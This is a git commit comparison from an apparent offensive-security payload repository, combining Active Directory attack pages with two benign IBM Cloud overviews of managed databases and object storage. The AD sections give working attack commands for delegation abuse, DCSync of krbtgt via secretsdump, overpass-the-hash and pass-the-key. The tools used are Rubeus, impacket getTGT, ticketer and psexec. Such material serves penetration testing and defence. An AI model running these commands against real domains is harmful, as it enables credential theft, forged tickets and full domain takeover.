Compare commits


4 Commits

| Author | SHA1 | Message | Date |
| ------ | ---- | ------- | ---- |
| Nidhi Shinde | df832cc3db | Merge c8e78f4c82 into d603ecc3b8 | 2024-10-30 13:06:34 +01:00 |
| Swissky | d603ecc3b8 | Pass The Key | 2024-10-27 15:29:34 +01:00 |
| Nidhi Shinde | c8e78f4c82 | Create ibm-cloud-object-storage.md | 2024-10-08 02:45:19 +05:30 |
| Nidhi Shinde | 7ffd929ec1 | Create ibm-cloud-databases.md | 2024-10-08 02:29:56 +05:30 |
5 changed files with 298 additions and 9 deletions

View File

@@ -32,7 +32,7 @@
```
1. Clear the controlled machine account `servicePrincipalName` attribute
```ps1
krbrelayx@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
powershell@windows> . .\Powerview.ps1
powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose
@@ -63,7 +63,10 @@
cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT]
```
6. DCSync
```ps1
KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'
```
Automated exploitation:

View File

@@ -1,6 +1,6 @@
# Hash - OverPass-the-Hash
> In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberos ticket (TGT).
### Using impacket
@@ -10,9 +10,6 @@ root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ro
root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache"
root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass
root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hmac-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
root@kali:~$ kinit -t ~/mykeys tgwynn@LAB.ROPNOP.COM
root@kali:~$ klist
@@ -26,9 +23,6 @@ root@kali:~$ klist
# NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt
# Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation)
.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
```

View File

@@ -0,0 +1,57 @@
# Hash - Pass The Key
Pass The Key allows attackers to gain access to systems by using a valid session key instead of the user's password or NTLM hash. This technique is related to other credential-based attacks like Pass The Hash (PTH) and Pass The Ticket (PTT) but specifically uses session keys to authenticate.
Pre-authentication requires the requesting user to provide a secret key, which is derived from their password and may use encryption algorithms such as DES, RC4, AES128, or AES256.
* **RC4**: ARCFOUR-HMAC-MD5 (23). In this format the key is the NTLM hash: see the **Pass The Hash** page to use it directly, and the **Over Pass The Hash** page to request a TGT from it.
* **DES3**: DES3-CBC-SHA1 (16), should no longer be used; it has been deprecated since 2018 ([RFC 8429](https://www.rfc-editor.org/rfc/rfc8429)).
* **AES128**: AES128-CTS-HMAC-SHA1-96 (17), both AES encryption algorithms can be used with the Impacket and Rubeus tools.
* **AES256**: AES256-CTS-HMAC-SHA1-96 (18)
In the past, there were more encryption methods, which have since been deprecated.
| enctype | weak?| krb5 | Windows |
| -------------------------- | ---- | ------ | ------- |
| des-cbc-crc | weak | <1.18 | >=2000 |
| des-cbc-md4 | weak | <1.18 | ? |
| des-cbc-md5 | weak | <1.18 | >=2000 |
| des3-cbc-sha1 | | >=1.1 | none |
| arcfour-hmac | | >=1.3 | >=2000 |
| arcfour-hmac-exp | weak | >=1.3 | >=2000 |
| aes128-cts-hmac-sha1-96 | | >=1.3 | >=Vista |
| aes256-cts-hmac-sha1-96 | | >=1.3 | >=Vista |
| aes128-cts-hmac-sha256-128 | | >=1.15 | none |
| aes256-cts-hmac-sha384-192 | | >=1.15 | none |
| camellia128-cts-cmac | | >=1.9 | none |
| camellia256-cts-cmac | | >=1.9 | none |
Windows 7 and later releases disable the single-DES enctypes by default.
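For the AES enctypes above, the key is derived from the password with PBKDF2-HMAC-SHA1 over a salt built from the realm and principal name (RFC 3962). A minimal sketch of that first stage, with made-up credentials; the real enctype key is one further AES-based folding step, `DK(tkey, "kerberos")`, omitted here:

```python
import hashlib

# Illustrative inputs; by default the Kerberos salt is REALM + principal name.
password = b"Passw0rd!"
salt = b"LAB.LOCALAdministrator"

# AES256-CTS-HMAC-SHA1-96: PBKDF2-HMAC-SHA1, 4096 iterations, 32-byte output.
tkey = hashlib.pbkdf2_hmac("sha1", password, salt, 4096, dklen=32)
print(tkey.hex())
# RFC 3962 then applies DK(tkey, "kerberos"), an AES-CBC-based key
# derivation, to obtain the final enctype key (not shown here).
```

This is why the same password yields different AES keys in different domains: the realm is part of the salt.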
Either use the AES key to generate a ticket with `ticketer`, or request a new TGT using `getTGT.py` script from Impacket.
## Generate a new ticket
* [fortra/impacket/ticketer.py](https://github.com/fortra/impacket/blob/master/examples/ticketer.py)
```powershell
impacket-ticketer -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 -domain lab.local -domain-sid S-1-5-21-2218639424-46377867-3078535060 Administrator
```
## Request a TGT
* [fortra/impacket/getTGT.py](https://github.com/fortra/impacket/blob/master/examples/getTGT.py)
```powershell
impacket-getTGT -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 lab.local
```
* [GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)
```powershell
.\Rubeus.exe asktgt /user:Administrator /aes128:bc09f84dcb4eabccb981a9f265035a72 /ptt
.\Rubeus.exe asktgt /user:Administrator /aes256:2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 /opsec /ptt
```
## References
* [MIT Kerberos Documentation - Encryption types](https://web.mit.edu/kerberos/krb5-1.18/doc/admin/enctypes.html)

View File

@@ -0,0 +1,129 @@
# IBM Cloud Managed Database Services
IBM Cloud offers a variety of managed database services that allow organizations to easily deploy, manage, and scale databases without the operational overhead. These services ensure high availability, security, and performance, catering to a wide range of application requirements.
## Supported Database Engines
### 1. PostgreSQL
- **Description**: PostgreSQL is an open-source relational database known for its robustness, extensibility, and SQL compliance. It supports advanced data types and offers features like complex queries, ACID compliance, and full-text search.
- **Key Features**:
- Automated backups and recovery
- High availability with clustering options
- Scale horizontally and vertically with ease
- Support for JSON and unstructured data
- Advanced security features including encryption
- **Use Cases**:
- Web applications
- Data analytics
- Geospatial data applications
- E-commerce platforms
#### Connecting to PostgreSQL
You can connect to a PostgreSQL database using various programming languages. Here's an example in Python using the `psycopg2` library.
```python
import psycopg2
# Establishing a connection to the PostgreSQL database
conn = psycopg2.connect(
dbname="your_database_name",
user="your_username",
password="your_password",
host="your_host",
port="your_port"
)
cursor = conn.cursor()
# Example of a simple query
cursor.execute("SELECT * FROM your_table;")
records = cursor.fetchall()
print(records)
# Closing the connection
cursor.close()
conn.close()
```
### 2. MongoDB
- **Description**: MongoDB is a leading NoSQL database that provides a flexible data model, enabling developers to work with unstructured data and large volumes of data. It uses a document-oriented data model and is designed for scalability and performance.
- **Key Features**:
- Automatic sharding for horizontal scaling
- Built-in replication for high availability
- Rich querying capabilities and indexing options
- Full-text search and aggregation framework
- Flexible schema design
- **Use Cases**:
- Content management systems
- Real-time analytics
- Internet of Things (IoT) applications
- Mobile applications
#### Connecting to MongoDB
You can connect to MongoDB using various programming languages. Here's an example in JavaScript using the `mongodb` library.
```javascript
const { MongoClient } = require('mongodb');
// Connection URI
const uri = "mongodb://your_username:your_password@your_host:your_port/your_database";
// Create a new MongoClient
const client = new MongoClient(uri);
async function run() {
try {
// Connect to the MongoDB cluster
await client.connect();
// Access the database
const database = client.db('your_database');
const collection = database.collection('your_collection');
// Example of a simple query
const query = { name: "John Doe" };
const user = await collection.findOne(query);
console.log(user);
} finally {
// Ensures that the client will close when you finish/error
await client.close();
}
}
run().catch(console.dir);
```
## Benefits of Using IBM Cloud Managed Database Services
- **Automated Management**: Reduce operational overhead with automated backups, scaling, and updates.
- **High Availability**: Built-in redundancy and failover mechanisms ensure uptime and data availability.
- **Security**: Comprehensive security features protect your data with encryption, access controls, and compliance support.
- **Scalability**: Easily scale your database resources up or down based on application needs.
- **Performance Monitoring**: Built-in monitoring and alerting tools provide insights into database performance and health.
## Getting Started
To begin using IBM Cloud Managed Database services, follow these steps:
1. **Sign Up**: Create an IBM Cloud account [here](https://cloud.ibm.com/registration).
2. **Select Database Service**: Choose the managed database service you need (PostgreSQL, MongoDB, etc.).
3. **Configure Your Database**: Set up your database parameters, including region, storage size, and instance type.
4. **Deploy**: Launch your database instance with a few clicks.
5. **Connect**: Use the provided connection string to connect your applications to the database.
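The connection string from step 5 is typically a URI. As a minimal sketch, it can be split into the keyword arguments the earlier `psycopg2` example expects; the URI below is a made-up placeholder, not a real IBM Cloud endpoint:

```python
from urllib.parse import urlparse

# Hypothetical connection string of the kind a managed PostgreSQL
# deployment hands out; host, port, and credentials are placeholders.
uri = "postgres://your_username:your_password@your_host:31525/your_database_name"

parts = urlparse(uri)
conn_params = {
    "dbname": parts.path.lstrip("/"),  # path component minus the leading slash
    "user": parts.username,
    "password": parts.password,
    "host": parts.hostname,
    "port": parts.port,
}
print(conn_params)
# These keyword arguments can be passed straight to psycopg2.connect(**conn_params).
```

Real IBM Cloud connection strings may also carry TLS certificate details, which should be taken from the service credentials rather than hard-coded.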
## Conclusion
IBM Cloud's managed database services provide a reliable and efficient way to manage your database needs. With support for leading databases like PostgreSQL and MongoDB, organizations can focus on building innovative applications while leveraging IBM's infrastructure and expertise.
## Additional Resources
- [IBM Cloud Databases Documentation](https://cloud.ibm.com/docs/databases?code=cloud)
- [IBM Cloud PostgreSQL Documentation](https://cloud.ibm.com/docs/databases?code=postgres)
- [IBM Cloud MongoDB Documentation](https://cloud.ibm.com/docs/databases?code=mongo)

View File

@@ -0,0 +1,106 @@
# IBM Cloud Object Storage
IBM Cloud Object Storage is a highly scalable, secure, and durable cloud storage service designed for storing and accessing unstructured data like images, videos, backups, and documents. With the ability to scale seamlessly based on the data volume, IBM Cloud Object Storage is ideal for handling large-scale data storage needs, such as archiving, backup, and modern applications like AI and machine learning workloads.
## Key Features
### 1. **Scalability**
- **Dynamic Scaling**: IBM Cloud Object Storage can grow dynamically with your data needs, ensuring you never run out of storage space. There's no need for pre-provisioning or capacity planning, as it scales automatically based on demand.
- **No Size Limits**: Store an unlimited amount of data, from kilobytes to petabytes, without constraints.
### 2. **High Durability and Availability**
- **Redundancy**: Data is automatically distributed across multiple regions and availability zones to ensure that it remains available and protected, even in the event of failures.
- **99.999999999% Durability (11 nines)**: IBM Cloud Object Storage provides enterprise-grade durability, meaning that your data is safe and recoverable.
### 3. **Flexible Storage Classes**
IBM Cloud Object Storage offers multiple storage classes, allowing you to choose the right balance between performance and cost:
- **Standard**: For frequently accessed data, providing high performance and low latency.
- **Vault**: For infrequently accessed data with lower storage costs.
- **Cold Vault**: For long-term storage of rarely accessed data, such as archives.
- **Smart Tier**: Automatically optimizes storage costs by tiering objects based on access patterns.
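As a rough illustration of the trade-off, the class choice can be driven by expected access frequency; the thresholds below are arbitrary examples, not IBM-defined, and Smart Tier exists precisely to avoid hand-picking them:

```python
def pick_storage_class(accesses_per_month: float) -> str:
    """Map expected access frequency to one of the classes listed above.
    Thresholds are illustrative only."""
    if accesses_per_month >= 1:
        return "Standard"       # frequently accessed, latency-sensitive
    if accesses_per_month >= 1 / 12:  # roughly once a year or more
        return "Vault"          # infrequent access, lower storage cost
    return "Cold Vault"         # rarely accessed archives

print(pick_storage_class(30))    # Standard
print(pick_storage_class(0.5))   # Vault
print(pick_storage_class(0.01))  # Cold Vault
```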
### 4. **Secure and Compliant**
- **Encryption**: Data is encrypted at rest and in transit using robust encryption standards.
- **Access Controls**: Fine-grained access policies using IBM Identity and Access Management (IAM) allow you to control who can access your data.
- **Compliance**: Meets a wide range of industry standards and regulatory requirements, including GDPR, HIPAA, and ISO certifications.
### 5. **Cost-Effective**
- **Pay-as-You-Go**: With IBM Cloud Object Storage, you only pay for the storage and features you use, making it cost-effective for a variety of workloads.
- **Data Lifecycle Policies**: Automate data movement between storage classes to optimize costs over time based on data access patterns.
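In S3-compatible object stores, lifecycle policies like those described above are expressed as a rules document. A minimal sketch that builds one (the rule ID, day counts, and archive storage class name are illustrative assumptions; the exact schema a given deployment accepts should be checked against the IBM COS documentation):

```python
def lifecycle_config(days_to_archive: int, days_to_expire: int) -> dict:
    """Build an S3-style lifecycle configuration that transitions objects
    to a colder tier after one period and deletes them after another."""
    return {
        "Rules": [
            {
                "ID": "archive-then-expire",        # illustrative rule name
                "Status": "Enabled",
                "Filter": {"Prefix": ""},           # apply to every object
                "Transitions": [
                    {"Days": days_to_archive, "StorageClass": "GLACIER"}
                ],
                "Expiration": {"Days": days_to_expire},
            }
        ]
    }

config = lifecycle_config(days_to_archive=30, days_to_expire=365)
# With an ibm_boto3 client (see the upload example below), this could be
# applied via the boto3-style call:
# cos.put_bucket_lifecycle_configuration(Bucket='your_bucket_name',
#                                        LifecycleConfiguration=config)
print(config["Rules"][0]["ID"])
```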
### 6. **Global Accessibility**
- **Multi-Regional Replication**: Distribute your data across multiple regions for greater accessibility and redundancy.
- **Low Latency**: Access your data with minimal latency, no matter where your users or applications are located globally.
### 7. **Integration with IBM Cloud Services**
IBM Cloud Object Storage integrates seamlessly with a wide range of IBM Cloud services, including:
- **IBM Watson AI**: Store and manage data used in AI and machine learning workloads.
- **IBM Cloud Functions**: Use serverless computing to trigger actions when new objects are uploaded.
- **IBM Kubernetes Service**: Persistent storage for containers and microservices applications.
## Use Cases
1. **Backup and Archiving**:
- IBM Cloud Object Storage is ideal for long-term storage of backups and archived data due to its durability and cost-efficient pricing models. Data lifecycle policies automate the movement of less-frequently accessed data to lower-cost storage classes like Vault and Cold Vault.
2. **Content Delivery**:
   - Serve media files like images, videos, and documents to global users with minimal latency using IBM Cloud Object Storage's multi-regional replication and global accessibility.
3. **Big Data and Analytics**:
- Store large datasets and logs for analytics applications. IBM Cloud Object Storage can handle vast amounts of data, which can be processed using IBM analytics services or machine learning models.
4. **Disaster Recovery**:
- Ensure business continuity by storing critical data redundantly across multiple locations, allowing you to recover from disasters or data loss events.
5. **AI and Machine Learning**:
- Store and manage training datasets for machine learning and AI applications. IBM Cloud Object Storage integrates directly with IBM Watson and other AI services, providing scalable storage for vast datasets.
## Code Example: Uploading and Retrieving Data
Here's an example using Python and the IBM Cloud SDK to upload and retrieve an object from IBM Cloud Object Storage.
### 1. **Installation**:
Install the IBM Cloud Object Storage SDK for Python:
```bash
pip install ibm-cos-sdk
```
### 2. **Uploading an Object**:
```python
import ibm_boto3
from ibm_botocore.client import Config
# Initialize the client
cos = ibm_boto3.client('s3',
ibm_api_key_id='your_api_key',
ibm_service_instance_id='your_service_instance_id',
config=Config(signature_version='oauth'),
endpoint_url='https://s3.us.cloud-object-storage.appdomain.cloud')
# Upload a file
cos.upload_file(Filename='example.txt', Bucket='your_bucket_name', Key='example.txt')
print('File uploaded successfully.')
```
### 3. **Retrieving an Object**:
```python
# Download an object
cos.download_file(Bucket='your_bucket_name', Key='example.txt', Filename='downloaded_example.txt')
print('File downloaded successfully.')
```
### Configuring IBM Cloud Object Storage
To start using IBM Cloud Object Storage, follow these steps:
1. **Sign Up**: Create an IBM Cloud account [here](https://cloud.ibm.com/registration).
2. **Create Object Storage**: In the IBM Cloud console, navigate to **Catalog** > **Storage** > **Object Storage**, and follow the steps to create an instance.
3. **Create Buckets**: After creating an instance, you can create storage containers (buckets) to store your objects. Buckets are where data is logically stored.
4. **Manage Access**: Define access policies using IBM IAM for your Object Storage buckets.
5. **Connect and Use**: Use the provided API keys and endpoints to connect to your Object Storage instance and manage your data.
## Conclusion
IBM Cloud Object Storage offers a highly scalable, durable, and cost-effective storage solution for various types of workloads, from simple backups to complex AI and big data applications. With features like lifecycle management, security, and integration with other IBM Cloud services, it's a flexible choice for any organization looking to manage unstructured data efficiently.